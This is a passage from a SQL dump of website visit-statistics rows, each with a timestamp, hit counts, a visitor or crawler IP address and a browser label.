,'54.36.148.190','other'),(264075,1530260923,1,1,0,0,'54.36.148.222','other'),(264076,1530260935,1,1,0,0,'54.36.148.100','other'),(264077,1530261147,1,1,0,0,'54.36.149.90','other'),(264078,1530261591,1,1,0,0,'54.36.149.87','other'),(264079,1530261599,1,1,0,0,'54.36.148.201','other'),(264080,1530261713,1,1,0,0,'54.36.148.72','other'),(264081,1530262132,1,1,0,0,'216.244.66.241','other'),(264082,1530262376,1,1,0,0,'54.36.148.230','other'),(264083,1530262481,1,1,0,0,'54.36.148.65','other'),(264084,1530262797,1,1,0,0,'54.36.149.46','other'),(264085,1530262843,1,1,0,0,'194.247.173.123','other'),(264086,1530263125,1,1,0,0,'54.36.148.209','other'),(264087,1530263402,1,1,0,0,'54.36.148.69','other'),(264088,1530263814,1,1,0,0,'54.36.148.82','other'),(264089,1530263996,1,1,0,0,'54.36.149.29','other'),(264090,1530264126,1,1,0,0,'8.29.198.26','other'),(264091,1530264434,1,1,0,0,'54.36.148.33','other'),(264092,1530264837,6,6,0,0,'216.244.66.241','other'),(264093,1530265048,1,1,0,0,'54.36.148.55','other'),(264094,1530265320,1,1,0,0,'54.36.148.96','other'),(264095,1530265529,1,1,0,0,'54.36.149.23','other'),(264096,1530265570,1,1,0,0,'54.36.149.70','other'),(264097,1530266032,1,1,0,0,'54.36.149.63','other'),(264098,1530266080,1,1,0,0,'54.36.148.67','other'),(264099,1530266087,1,1,0,0,'54.36.148.149','other'),(264100,1530266094,1,1,0,0,'54.36.148.97','other'),(264101,1530266987,1,1,0,0,'54.36.149.26','other'),(264102,1530267183,1,1,0,0,'54.36.149.6','other'),(264103,1530267192,1,1,0,0,'54.36.149.63','other'),(264104,1530267244,1,1,0,0,'54.36.148.154','other'),(264105,1530267280,1,1,0,0,'54.36.148.243','other'),(264106,1530267474,1,1,0,0,'54.36.148.250','other'),(264107,1530267514,1,1,0,0,'54.36.148.210','other'),(264108,1530267522,1,1,0,0,'54.36.148.194','other'),(264109,1530267553,1,1,0,0,'162.210.196.130','other'),(264110,1530267615,3,3,0,0,'216.244.66.241','other'),(264111,1530267658,1,1,0,0,'54.36.149.36','other'),(264112,1530267930,1,1,0,0,'54.36.149.37','other'),(264113,1530267935,1,1,0,0,'54.36.148.80','other'),(264114,1530268209,1,1,0,0,'54.36.148.38','other'),(264115,1530268620,1,1,0,0,'54.36.148.149','other'),(264116,1530268683,1,1,0,0,'54.36.148.139','other'),(264117,1530268843,1,1,0,0,'37.73.147.116','other'),(264118,1530269380,1,1,0,0,'54.36.148.85','other'),(264119,1530269786,1,1,0,0,'54.36.149.58','other'),(264120,1530269791,3,3,0,0,'5.9.156.30','other'),(264121,1530270111,1,1,0,0,'54.36.149.83','other'),(264122,1530270389,1,1,0,0,'54.36.148.12','other'),(264123,1530270534,1,1,0,0,'54.36.148.198','other'),(264124,1530270581,1,1,0,0,'8.29.198.26','other'),(264125,1530270933,1,1,0,0,'54.36.149.0','other'),(264126,1530271021,1,1,0,0,'54.36.149.74','other'),(264127,1530271144,1,1,0,0,'54.36.148.252','other'),(264128,1530271181,1,1,0,0,'216.244.66.241','other'),(264129,1530271628,1,1,0,0,'54.36.148.192','other'),(264130,1530271939,1,1,0,0,'54.36.148.186','other'),(264131,1530272089,1,0,1,0,'66.249.66.156',''),(264132,1530272402,1,1,0,0,'54.36.148.231','other'),(264133,1530272495,1,1,0,0,'54.36.148.153','other'),(264134,1530272602,1,1,0,0,'54.36.149.7','other'),(264135,1530272658,1,1,0,0,'54.36.148.175','other'),(264136,1530273043,1,1,0,0,'54.36.148.21','other'),(264137,1530273324,1,1,0,0,'54.36.149.65','other'),(264138,1530273328,1,1,0,0,'216.244.66.241','other'),(264139,1530274146,1,1,0,0,'54.36.149.66','other'),(264140,1530274299,1,1,0,0,'54.36.148.211','other'),(264141,1530274380,1,1,0,0,'66.249.66.74','chrome'),(264142,1530274386,1,1,0,0,'66.249.66.155','chrome'),(264143,1530274606,1,1,0,0,'54.36.148.212','other'),(264144,1530274774,1,1,0,0,'54.36.148.203','other'),(264145,1530274855,1,1,0,0,'54.36.149.44','other'),(264146,1530274956,1,1,0,0,'8.29.198.27','other'),(264147,1530275061,1,1,0,0,'54.36.148.136','other'),(264148,1530275153,1,1,0,0,'93.79.42.219','firefox'),(264149,1530275546,1,1,0,0,'54.36.148.80','other'),(264150,1530275687,26,26,0,0,'173.208.130.202','other'),(264151,1530275782,1,1,0,0,'54.36.148.171','other'),(264152,1530275834,2,2,0,0,'62.210.103.36','other'),(264153,1530275925,1,1,0,0,'54.36.148.226','other'),(264154,1530275963,1,1,0,0,'54.36.148.166','other'),(264155,1530276125,1,1,0,0,'216.244.66.241','other'),(264156,1530276286,1,1,0,0,'54.36.148.98','other'),(264157,1530276587,1,1,0,0,'54.36.148.105','other'),(264158,1530276599,1,0,1,0,'66.249.66.76',''),(264159,1530277036,1,1,0,0,'54.36.148.97','other'),(264160,1530277395,1,1,0,0,'54.36.148.200','other'),(264161,1530277531,1,1,0,0,'138.201.61.158','other'),(264162,1530277654,1,1,0,0,'54.36.149.10','other'),(264163,1530277757,1,1,0,0,'54.36.148.51','other'),(264164,1530277778,1,1,0,0,'95.163.255.97','other'),(264165,1530277826,1,1,0,0,'54.36.148.195','other'),(264166,1530277900,1,1,0,0,'54.36.149.61','other'),(264167,1530277983,1,1,0,0,'54.36.148.48','other'),(264168,1530278641,1,1,0,0,'54.36.148.166','other'),(264169,1530278708,1,1,0,0,'54.36.148.134','other'),(264170,1530279198,1,1,0,0,'54.36.148.223','other'),(264171,1530279341,1,1,0,0,'54.36.148.191','other'),(264172,1530279450,1,1,0,0,'157.55.39.143','other'),(264173,1530279495,1,1,0,0,'54.36.148.59','other'),(264174,1530279620,1,1,0,0,'54.36.149.28','other'),(264175,1530279621,1,1,0,0,'54.36.148.253','other'),(264176,1530279772,1,1,0,0,'54.36.148.173','other'),(264177,1530279860,1,1,0,0,'54.36.148.10','other'),(264178,1530279887,1,1,0,0,'54.36.148.93','other'),(264179,1530280131,1,1,0,0,'54.36.148.91','other'),(264180,1530280146,1,1,0,0,'54.36.148.101','other'),(264181,1530280244,1,1,0,0,'54.36.149.21','other'),(264182,1530280268,1,1,0,0,'54.36.148.39','other'),(264183,1530280611,1,1,0,0,'54.36.148.54','other'),(264184,1530280619,1,1,0,0,'54.36.148.98','other'),(264185,1530281017,1,0,1,0,'66.249.66.155',''),(264186,1530281179,1,1,0,0,'54.36.149.97','other'),(264187,1530281305,1,1,0,0,'54.36.148.210','other'),(264188,1530281439,1,1,0,0,'8.29.198.27','other'),(264189,1530281591,1,1,0,0,'54.36.148.41','other'),(264190,1530281636,1,1,0,0,'54.36.148.227','other'),(264191,1530281741,1,1,0,0,'54.36.149.84','other'),(264192,1530281848,1,1,0,0,'54.36.148.229','other'),(264193,1530282237,1,0,1,0,'66.249.66.75',''),(264194,1530282317,1,1,0,0,'54.36.149.80','other'),(264195,1530282627,1,1,0,0,'54.36.149.33','other'),(264196,1530282904,1,1,0,0,'195.201.150.200','other'),(264197,1530282949,1,1,0,0,'157.55.39.137','other'),(264198,1530283077,1,1,0,0,'54.36.149.32','other'),(264199,1530283113,6,6,0,0,'62.210.103.36','other'),(264200,1530283170,1,1,0,0,'157.55.39.143','other'),(264201,1530283503,1,1,0,0,'54.36.148.97','other'),(264202,1530284179,1,1,0,0,'216.244.66.241','other'),(264203,1530284221,1,0,1,0,'66.249.66.155',''),(264204,1530284297,1,1,0,0,'54.36.148.18','other'),(264205,1530284556,1,0,1,0,'66.249.66.157',''),(264206,1530284739,1,1,0,0,'54.36.148.153','other'),(264207,1530285115,1,1,0,0,'54.36.149.5','other'),(264208,1530285131,1,1,0,0,'54.36.149.7','other'),(264209,1530285266,2,2,0,0,'216.244.66.241','other'),(264210,1530285543,1,1,0,0,'54.36.148.189','other'),(264211,1530285678,1,1,0,0,'54.36.148.41','other'),(264212,1530285791,1,1,0,0,'8.29.198.27','other'),(264213,1530285854,1,1,0,0,'54.36.149.54','other'),(264214,1530285986,1,1,0,0,'54.36.148.61','other'),(264215,1530286023,1,1,0,0,'54.36.148.190','other'),(264216,1530286353,1,1,0,0,'54.36.149.57','other'),(264217,1530286434,1,0,1,0,'66.249.66.157',''),(264218,1530286731,1,1,0,0,'54.36.149.47','other'),(264219,1530286784,1,1,0,0,'54.36.148.158','other'),(264220,1530286922,1,1,0,0,'54.36.148.134','other'),(264221,1530286939,1,1,0,0,'66.249.66.76','chrome'),(264222,1530287195,1,1,0,0,'157.55.39.228','other'),(264223,1530287239,1,1,0,0,'54.36.148.76','other'),(264224,1530287416,2,2,0,0,'216.244.66.241','other'),(264225,1530287485,1,1,0,0,'54.36.148.175','other'),(264226,1530287788,1,1,0,0,'207.46.13.169','other'),(264227,1530288003,1,1,0,0,'54.36.148.198','other'),(264228,1530288125,1,1,0,0,'54.36.148.109','other'),(264229,1530288225,1,1,0,0,'54.36.148.161','other'),(264230,1530288229,1,1,0,0,'54.36.149.72','other'),(264231,1530288420,1,1,0,0,'54.36.148.119','other'),(264232,1530288540,1,1,0,0,'54.36.149.59','other'),(264233,1530288576,1,1,0,0,'54.36.148.186','other'),(264234,1530288854,1,1,0,0,'54.36.148.252','other'),(264235,1530288899,1,1,0,0,'54.36.148.41','other'),(264236,1530288931,1,1,0,0,'54.36.148.66','other'),(264237,1530288945,1,1,0,0,'54.36.148.238','other'),(264238,1530288960,1,1,0,0,'54.36.148.55','other'),(264239,1530288978,1,1,0,0,'54.36.148.20','other'),(264240,1530289288,2,2,0,0,'37.187.134.89','msie'),(264241,1530289293,10,10,0,0,'37.187.134.89','opera'),(264242,1530289393,1,1,0,0,'54.36.148.233','other'),(264243,1530289421,1,1,0,0,'54.36.149.53','other'),(264244,1530289699,1,1,0,0,'216.244.66.241','other'),(264245,1530289998,1,1,0,0,'46.242.10.116','msie'),(264246,1530290036,1,0,1,0,'66.249.66.155',''),(264247,1530290171,1,1,0,0,'54.36.148.235','other'),(264248,1530290241,1,1,0,0,'54.36.148.11','other'),(264249,1530290271,1,1,0,0,'54.36.148.222','other'),(264250,1530290460,1,1,0,0,'54.36.148.81','other'),(264251,1530290690,1,1,0,0,'180.76.15.148','other'),(264252,1530290878,1,1,0,0,'54.36.148.107','other'),(264253,1530291294,1,1,0,0,'54.36.148.194','other'),(264254,1530291403,1,0,1,0,'66.249.66.155',''),(264255,1530291530,1,1,0,0,'54.36.148.96','other'),(264256,1530291553,1,1,0,0,'54.36.148.153','other'),(264257,1530291744,1,1,0,0,'54.36.149.40','other'),(264258,1530291791,1,1,0,0,'54.36.148.142','other'),(264259,1530292054,1,1,0,0,'54.36.148.213','other'),(264260,1530292299,1,1,0,0,'8.29.198.26','other'),(264261,1530292683,1,1,0,0,'54.36.148.77','other'),(264262,1530292783,1,1,0,0,'216.244.66.241','other'),(264263,1530293282,1,1,0,0,'54.36.149.43','other'),(264264,1530293769,1,1,0,0,'54.36.149.13','other'),(264265,1530293797,1,1,0,0,'54.36.148.130','other'),(264266,1530293919,1,1,0,0,'82.145.223.90','chrome'),(264267,1530294300,1,1,0,0,'54.36.148.159','other'),(264268,1530294330,1,1,0,0,'66.249.66.75','chrome'),(264269,1530294454,2,2,0,0,'178.92.85.85','chrome'),(264270,1530294531,1,1,0,0,'54.36.149.19','other'),(264271,1530294584,1,1,0,0,'54.36.149.26','other'),(264272,1530294589,1,1,0,0,'54.36.148.209','other'),(264273,1530294613,1,1,0,0,'54.36.148.65','other'),(264274,1530294719,1,1,0,0,'54.36.148.40','other'),(264275,1530294860,1,1,0,0,'54.36.148.220','other'),(264276,1530295075,1,1,0,0,'54.36.148.42','other'),(264277,1530295320,1,1,0,0,'54.36.149.82','other'),(264278,1530295379,1,1,0,0,'54.36.148.39','other'),(264279,1530295540,1,1,0,0,'54.36.148.56','other'),(264280,1530295650,1,1,0,0,'54.36.148.151','other'),(264281,1530295812,2,2,0,0,'216.244.66.241','other'),(264282,1530296261,1,1,0,0,'54.36.148.250','other'),(264283,1530296397,1,1,0,0,'54.36.148.116','other'),(264284,1530296631,1,1,0,0,'8.29.198.26','other'),(264285,1530296763,1,1,0,0,'54.36.149.51','other'),(264286,1530296806,1,1,0,0,'54.36.148.239','other'),(264287,1530297265,1,1,0,0,'54.36.149.39','other'),(264288,1530297338,1,1,0,0,'54.36.148.242','other'),(264289,1530297379,1,1,0,0,'54.36.149.36','other'),(264290,1530297448,1,1,0,0,'54.36.148.128','other'),(264291,1530297576,1,1,0,0,'54.36.148.195','other'),(264292,1530297732,1,1,0,0,'54.36.149.103','other'),(264293,1530297751,1,1,0,0,'54.36.149.29','other'),(264294,1530297760,1,1,0,0,'54.36.149.91','other'),(264295,1530297809,1,1,0,0,'54.36.148.33','other'),(264296,1530297829,1,1,0,0,'54.36.148.113','other'),(264297,1530298313,1,1,0,0,'54.36.149.16','other'),(264298,1530298441,1,1,0,0,'157.55.39.228','other'),(264299,1530298963,1,1,0,0,'216.244.66.241','other'),(264300,1530299012,2,2,0,0,'54.36.148.127','other'),(264301,1530299149,1,1,0,0,'54.36.148.45','other'),(264302,1530299548,1,1,0,0,'66.249.66.74','chrome'),(264303,1530299564,1,1,0,0,'54.36.148.249','other'),(264304,1530299781,1,1,0,0,'54.36.148.76','other'),(264305,1530299959,1,1,0,0,'54.36.149.92','other'),(264306,1530300350,1,1,0,0,'54.36.148.108','other'),(264307,1530301145,1,1,0,0,'54.36.148.198','other'),(264308,1530301196,1,1,0,0,'54.36.149.34','other'),(264309,1530302147,1,1,0,0,'216.244.66.241','other'),(264310,1530302366,1,1,0,0,'54.36.149.45','other'),(264311,1530302705,1,1,0,0,'37.204.43.250','msie'),(264312,1530302719,1,1,0,0,'54.36.148.186','other'),(264313,1530302801,1,1,0,0,'54.36.148.242','other'),(264314,1530302860,1,1,0,0,'54.36.149.102','other'),(264315,1530302963,1,1,0,0,'54.36.148.221','other'),(264316,1530303060,1,1,0,0,'54.36.148.62','other'),(264317,1530303062,1,1,0,0,'54.36.148.37','other'),(264318,1530303130,2,2,0,0,'91.196.178.169','chrome'),(264319,1530303136,1,1,0,0,'8.29.198.27','other'),(264320,1530303149,1,1,0,0,'54.36.148.188','other'),(264321,1530303223,1,1,0,0,'54.36.148.163','other'),(264322,1530303443,1,1,0,0,'54.36.148.90','other'),(264323,1530303444,1,1,0,0,'54.36.149.25','other'),(264324,1530303514,1,1,0,0,'54.36.149.52','other'),(264325,1530303562,1,1,0,0,'54.36.148.16','other'),(264326,1530303665,1,1,0,0,'216.244.66.241','other'),(264327,1530303767,1,1,0,0,'54.36.149.51','other'),(264328,1530303803,1,0,1,0,'66.249.66.155',''),(264329,1530304018,1,0,1,0,'66.249.66.156',''),(264330,1530304248,1,1,0,0,'54.36.149.101','other'),(264331,1530304273,1,1,0,0,'54.36.148.191','other'),(264332,1530304368,1,1,0,0,'54.36.149.42','other'),(264333,1530304690,1,1,0,0,'54.36.148.204','other'),(264334,1530305135,1,1,0,0,'54.36.149.82','other'),(264335,1530305249,1,1,0,0,'66.249.66.76','chrome'),(264336,1530305259,1,1,0,0,'54.36.148.229','other'),(264337,1530305344,1,1,0,0,'54.36.149.11','other'),(264338,1530305416,1,1,0,0,'54.36.148.200','other'),(264339,1530305609,1,1,0,0,'54.36.148.144','other'),(264340,1530305723,1,1,0,0,'54.36.148.185','other'),(264341,1530305807,1,1,0,0,'54.36.149.56','other'),(264342,1530305888,1,1,0,0,'157.55.39.137','other'),(264343,1530306237,1,1,0,0,'54.36.148.90','other'),(264344,1530306289,1,1,0,0,'54.36.148.77','other'),(264345,1530306338,1,0,1,0,'66.249.66.156',''),(264346,1530306466,1,1,0,0,'54.36.148.12','other'),(264347,1530306509,1,1,0,0,'128.72.68.75','msie'),(264348,1530306596,1,1,0,0,'54.36.148.248','other'),(264349,1530306629,1,1,0,0,'54.36.148.43','other'),(264350,1530306756,3,3,0,0,'216.244.66.241','other'),(264351,1530306935,1,1,0,0,'54.36.148.113','other'),(264352,1530306982,1,1,0,0,'54.36.149.9','other'),(264353,1530307180,1,1,0,0,'54.36.148.155','other'),(264354,1530307462,1,1,0,0,'8.29.198.26','other'),(264355,1530307824,1,1,0,0,'54.36.148.12','other'),(264356,1530307868,1,0,1,0,'66.249.66.156',''),(264357,1530308471,1,1,0,0,'54.36.148.118','other'),(264358,1530308492,1,1,0,0,'54.36.149.53','other'),(264359,1530308496,1,1,0,0,'54.36.148.104','other'),(264360,1530308527,1,1,0,0,'54.36.148.15','other'),(264361,1530308555,1,1,0,0,'46.211.110.38','chrome'),(264362,1530308569,1,1,0,0,'216.244.66.241','other'),(264363,1530308879,1,1,0,0,'54.36.149.65','other'),(264364,1530309182,1,1,0,0,'54.36.148.161','other'),(264365,1530309225,3,0,3,0,'66.249.66.157',''),(264366,1530309889,1,1,0,0,'54.36.148.195','other'),(264367,1530310005,1,1,0,0,'216.244.66.241','other'),(264368,1530310234,1,1,0,0,'54.36.148.139','other'),(264369,1530310367,1,1,0,0,'178.159.37.11','chrome'),(264370,1530310376,1,1,0,0,'54.36.148.126','other'),(264371,1530310766,1,1,0,0,'54.36.148.136','other'),(264372,1530311092,1,1,0,0,'54.36.148.41','other'),(264373,1530311214,1,1,0,0,'54.36.148.198','other'),(264374,1530311889,1,1,0,0,'216.244.66.241','other'),(264375,1530312246,1,1,0,0,'54.36.148.197','other'),(264376,1530312397,1,1,0,0,'54.36.149.4','other'),(264377,1530312636,1,1,0,0,'54.36.148.87','other'),(264378,1530312787,1,1,0,0,'54.36.148.149','other'),(264379,1530312886,1,1,0,0,'54.36.148.198','other'),(264380,1530312908,1,1,0,0,'54.36.148.78','other'),(264381,1530312949,1,1,0,0,'54.36.149.80','other'),(264382,1530313345,1,1,0,0,'54.36.149.104','other'),(264383,1530313457,1,1,0,0,'54.36.148.54','other'),(264384,1530313612,1,1,0,0,'54.36.148.222','other'),(264385,1530313639,1,1,0,0,'54.36.148.23','other'),(264386,1530313693,1,1,0,0,'54.36.149.40','other'),(264387,1530313867,1,1,0,0,'54.36.149.91','other'),(264388,1530313985,1,1,0,0,'8.29.198.25','other'),(264389,1530314168,1,1,0,0,'180.76.15.15','other'),(264390,1530314523,1,1,0,0,'54.36.148.221','other'),(264391,1530314697,1,1,0,0,'54.36.148.149','other'),(264392,1530314716,1,1,0,0,'54.36.148.24','other'),(264393,1530314858,1,0,1,0,'66.249.66.155',''),(264394,1530314888,1,1,0,0,'216.244.66.241','other'),(264395,1530315148,1,1,0,0,'54.36.148.142','other'),(264396,1530315531,1,1,0,0,'54.36.148.62','other'),(264397,1530315623,1,1,0,0,'54.36.148.164','other'),(264398,1530315890,1,1,0,0,'54.36.148.230','other'),(264399,1530316225,1,0,1,0,'66.249.66.155',''),(264400,1530316266,1,1,0,0,'54.36.149.50','other'),(264401,1530316336,1,1,0,0,'54.36.148.100','other'),(264402,1530316471,1,1,0,0,'54.36.148.222','other'),(264403,1530316707,1,1,0,0,'54.36.149.96','other'),(264404,1530316807,1,1,0,0,'54.36.149.14','other'),(264405,1530316847,1,1,0,0,'54.36.148.216','other'),(264406,1530317225,1,1,0,0,'54.36.148.185','other'),(264407,1530317272,1,1,0,0,'54.36.148.192','other'),(264408,1530317408,1,1,0,0,'54.36.148.193','other'),(264409,1530317525,1,1,0,0,'54.36.149.63','other'),(264410,1530317673,1,1,0,0,'54.36.149.66','other'),(264411,1530317746,1,1,0,0,'54.36.148.42','other'),(264412,1530318097,1,0,1,0,'66.249.66.155',''),(264413,1530318191,2,2,0,0,'54.36.149.89','other'),(264414,1530318290,1,1,0,0,'8.29.198.26','other'),(264415,1530318430,1,1,0,0,'54.36.149.49','other'),(264416,1530318572,1,1,0,0,'54.36.148.251','other'),(264417,1530318658,1,1,0,0,'54.36.149.21','other'),(264418,1530318672,1,1,0,0,'66.249.66.76','chrome'),(264419,1530318874,1,1,0,0,'54.36.149.79','other'),(264420,1530319457,1,1,0,0,'54.36.148.118','other'),(264421,1530319741,1,1,0,0,'54.36.149.0','other'),(264422,1530319996,1,1,0,0,'54.36.149.46','other'),(264423,1530320140,1,1,0,0,'54.36.148.48','other'),(264424,1530320357,1,1,0,0,'54.36.148.187','other'),(264425,1530320909,1,1,0,0,'54.36.149.49','other'),(264426,1530321230,1,1,0,0,'54.36.148.219','other'),(264427,1530321255,1,1,0,0,'54.36.148.229','other'),(264428,1530321307,1,1,0,0,'54.36.148.81','other'),(264429,1530321321,1,1,0,0,'54.36.148.245','other'),(264430,1530321325,1,1,0,0,'54.36.148.64','other'),(264431,1530321338,1,1,0,0,'157.55.39.143','other'),(264432,1530321494,1,1,0,0,'54.36.148.220','other'),(264433,1530321582,1,1,0,0,'54.36.148.157','other'),(264434,1530321651,1,1,0,0,'54.36.149.2','other'),(264435,1530321790,1,0,1,0,'66.249.66.157',''),(264436,1530322093,1,1,0,0,'54.36.148.162','other'),(264437,1530322105,1,1,0,0,'54.36.148.136','other'),(264438,1530322357,1,1,0,0,'54.36.148.43','other'),(264439,1530322556,1,1,0,0,'66.249.66.156','chrome'),(264440,1530322599,1,1,0,0,'54.36.149.51','other'),(264441,1530322798,1,1,0,0,'54.36.148.165','other'),(264442,1530323105,1,1,0,0,'216.244.66.241','other'),(264443,1530323387,1,1,0,0,'54.36.148.42','other'),(264444,1530323520,1,1,0,0,'54.36.148.107','other'),(264445,1530323596,1,1,0,0,'54.36.148.88','other'),(264446,1530323703,1,1,0,0,'5.167.115.165','msie'),(264447,1530323773,1,1,0,0,'54.36.148.194','other'),(264448,1530323995,1,1,0,0,'54.36.148.222','other'),(264449,1530324177,1,1,0,0,'141.8.142.74','other'),(264450,1530324297,1,1,0,0,'66.249.66.74','chrome'),(264451,1530324409,1,1,0,0,'54.36.149.65','other'),(264452,1530324830,1,1,0,0,'8.29.198.25','other'),(264453,1530325020,1,1,0,0,'54.36.148.196','other'),(264454,1530325033,1,1,0,0,'54.36.148.175','other'),(264455,1530325156,1,1,0,0,'54.36.148.158','other'),(264456,1530325228,1,1,0,0,'54.165.59.7','other'),(264457,1530325263,1,1,0,0,'54.36.148.236','other'),(264458,1530325435,1,1,0,0,'54.36.149.21','other'),(264459,1530325472,1,1,0,0,'54.36.149.67','other'),(264460,1530325597,1,1,0,0,'54.36.149.34','other'),(264461,1530325834,2,0,2,0,'66.249.66.157',''),(264462,1530326026,1,1,0,0,'54.36.148.242','other'),(264463,1530326080,1,1,0,0,'54.36.149.94','other'),(264464,1530326276,1,1,0,0,'54.36.148.20','other'),(264465,1530326312,1,1,0,0,'54.36.148.200','other'),(264466,1530326381,1,1,0,0,'54.36.148.195','other'),(264467,1530326576,1,1,0,0,'54.36.148.119','other'),(264468,1530327226,1,1,0,0,'54.36.148.107','other'),(264469,1530327508,1,1,0,0,'54.36.149.37','other'),(264470,1530327618,1,1,0,0,'54.36.148.67','other'),(264471,1530327643,1,1,0,0,'54.36.148.64','other'),(264472,1530327797,1,1,0,0,'54.36.148.185','other'),(264473,1530327883,1,1,0,0,'54.36.149.52','other'),(264474,1530328289,4,4,0,0,'216.244.66.241','other'),(264475,1530328482,1,1,0,0,'54.36.148.241','other'),(264476,1530328541,1,1,0,0,'54.36.149.81','other'),(264477,1530328844,1,1,0,0,'54.36.148.225','other'),(264478,1530328953,1,1,0,0,'54.36.149.83','other'),(264479,1530329120,1,1,0,0,'8.29.198.26','other'),(264480,1530329489,1,1,0,0,'54.36.148.151','other'),(264481,1530329617,1,1,0,0,'54.36.149.26','other'),(264482,1530329741,1,1,0,0,'54.36.149.76','other'),(264483,1530329750,1,1,0,0,'216.244.66.241','other'),(264484,1530330007,1,1,0,0,'54.36.148.217','other'),(264485,1530330181,1,1,0,0,'54.36.148.115','other'),(264486,1530330282,1,1,0,0,'54.36.148.119','other'),(264487,1530330330,1,1,0,0,'54.36.148.82','other'),(264488,1530330397,1,1,0,0,'54.36.148.156','other'),(264489,1530330403,1,1,0,0,'54.36.148.213','other'),(264490,1530330414,1,1,0,0,'66.249.66.76','chrome'),(264491,1530330482,1,1,0,0,'54.36.149.38','other'),(264492,1530330500,1,1,0,0,'54.36.148.207','other'),(264493,1530330798,1,1,0,0,'54.36.148.252','other'),(264494,1530330884,1,1,0,0,'54.36.148.117','other'),(264495,1530330942,1,1,0,0,'54.36.148.235','other'),(264496,1530331073,1,1,0,0,'54.36.149.95','other'),(264497,1530331376,1,1,0,0,'54.36.148.109','other'),(264498,1530332001,1,1,0,0,'54.36.148.193','other'),(264499,1530332078,1,1,0,0,'54.36.148.152','other'),(264500,1530332333,1,1,0,0,'54.36.148.23','other'),(264501,1530332372,1,1,0,0,'54.36.148.140','other'),(264502,1530332378,1,1,0,0,'54.36.148.235','other'),(264503,1530332399,1,1,0,0,'54.36.148.132','other'),(264504,1530332420,1,1,0,0,'54.36.148.177','other'),(264505,1530333133,1,1,0,0,'54.36.148.95','other'),(264506,1530333203,1,1,0,0,'35.239.135.210','other'),(264507,1530333343,1,1,0,0,'95.163.255.94','other'),(264508,1530333408,1,1,0,0,'54.36.148.21','other'),(264509,1530333573,1,1,0,0,'54.36.148.66','other'),(264510,1530333600,1,1,0,0,'54.36.148.155','other'),(264511,1530333668,1,1,0,0,'157.55.39.143','other'),(264512,1530333735,1,1,0,0,'54.36.149.104','other'),(264513,1530333798,1,1,0,0,'213.136.73.115','other'),(264514,1530334311,1,0,1,0,'66.249.66.156',''),(264515,1530334351,2,2,0,0,'141.8.142.74','other'),(264516,1530334557,1,1,0,0,'54.36.148.39','other'),(264517,1530334986,1,0,1,0,'66.249.66.157',''),(264518,1530335082,1,1,0,0,'54.36.148.41','other'),(264519,1530335215,2,2,0,0,'91.196.178.57','chrome'),(264520,1530335353,1,1,0,0,'54.36.148.248','other'),(264521,1530335398,4,4,0,0,'178.154.171.88','other'),(264522,1530335405,1,1,0,0,'52.53.201.78','chrome'),(264523,1530335428,1,1,0,0,'141.8.142.74','other'),(264524,1530335518,1,1,0,0,'54.36.149.3','other'),(264525,1530335536,1,1,0,0,'66.249.66.57','chrome'),(264526,1530335555,1,1,0,0,'216.244.66.241','other'),(264527,1530335668,1,1,0,0,'8.29.198.25','other'),(264528,1530335926,2,2,0,0,'158.69.254.103','other'),(264529,1530336370,1,0,1,0,'66.249.66.157',''),(264530,1530336400,1,1,0,0,'54.36.148.160','other'),(264531,1530336426,1,1,0,0,'54.36.148.254','other'),(264532,1530336499,5,5,0,0,'141.8.142.74','other'),(264533,1530336588,1,1,0,0,'54.36.148.156','other'),(264534,1530336591,1,1,0,0,'54.36.148.182','other'),(264535,1530336596,1,1,0,0,'37.9.113.182','other'),(264536,1530336627,1,1,0,0,'87.250.224.46','other'),(264537,1530336682,1,1,0,0,'54.36.148.85','other'),(264538,1530336779,1,1,0,0,'54.36.149.103','other'),(264539,1530336815,1,1,0,0,'54.36.148.148','other'),(264540,1530336857,1,1,0,0,'188.230.43.254','other'),(264541,1530337092,1,1,0,0,'54.36.148.211','other'),(264542,1530337516,1,1,0,0,'54.36.149.89','other'),(264543,1530337524,1,1,0,0,'54.36.149.54','other'),(264544,1530337572,2,2,0,0,'141.8.142.74','other'),(264545,1530337931,1,1,0,0,'54.36.148.202','other'),(264546,1530338091,1,1,0,0,'54.36.148.29','other'),(264547,1530338189,1,1,0,0,'54.36.149.102','other'),(264548,1530338264,1,1,0,0,'54.36.148.114','other'),(264549,1530338357,1,1,0,0,'87.250.224.46','other'),(264550,1530338387,1,1,0,0,'178.154.171.88','other'),(264551,1530338425,1,1,0,0,'216.244.66.241','other'),(264552,1530338543,1,1,0,0,'54.36.148.38','other'),(264553,1530338550,3,3,0,0,'141.8.142.74','other'),(264554,1530339337,1,1,0,0,'54.36.148.60','other'),(264555,1530339477,2,2,0,0,'178.154.171.88','other'),(264556,1530339572,1,1,0,0,'54.36.148.156','other'),(264557,1530339731,1,1,0,0,'54.36.148.194','other'),(264558,1530339954,1,1,0,0,'8.29.198.27','other'),(264559,1530340024,1,1,0,0,'54.36.148.132','other'),(264560,1530340170,4,4,0,0,'141.8.142.74','other'),(264561,1530340477,1,1,0,0,'54.36.148.145','other'),(264562,1530340844,1,1,0,0,'54.36.148.218','other'),(264563,1530341137,5,5,0,0,'141.8.142.74','other'),(264564,1530341182,1,1,0,0,'54.36.148.182','other'),(264565,1530341353,1,1,0,0,'54.36.149.100','other'),(264566,1530341489,1,1,0,0,'54.36.148.168','other'),(264567,1530341852,1,1,0,0,'54.36.148.119','other'),(264568,1530342047,1,1,0,0,'54.36.148.107','other'),(264569,1530342056,1,1,0,0,'54.36.149.51','other'),(264570,1530342076,1,0,1,0,'66.249.66.155',''),(264571,1530342092,1,1,0,0,'54.36.148.252','other'),(264572,1530342118,1,1,0,0,'54.36.148.157','other'),(264573,1530342166,3,3,0,0,'178.154.171.88','other'),(264574,1530342193,1,1,0,0,'87.250.224.46','other'),(264575,1530342299,1,1,0,0,'54.36.148.163','other'),(264576,1530342317,1,1,0,0,'54.36.149.28','other'),(264577,1530342462,1,1,0,0,'54.36.149.17','other'),(264578,1530342474,1,1,0,0,'54.36.148.125','other'),(264579,1530342526,1,1,0,0,'54.36.148.88','other'),(264580,1530342652,1,1,0,0,'54.36.148.42','other'),(264581,1530342660,1,1,0,0,'54.36.148.63','other'),(264582,1530342850,1,0,1,0,'66.249.66.61',''),(264583,1530342860,1,1,0,0,'141.8.142.74','other'),(264584,1530343389,1,1,0,0,'95.163.255.92','other'),(264585,1530343513,1,1,0,0,'54.36.149.46','other'),(264587,1530343590,1,1,0,0,'138.201.205.41','other'),(264588,1530343697,1,1,0,0,'54.36.148.149','other'),(264589,1530343907,1,1,0,0,'141.8.142.74','other'),(264590,1530343980,1,1,0,0,'178.154.171.88','other'),(264591,1530344539,1,1,0,0,'54.36.148.200','other'),(264592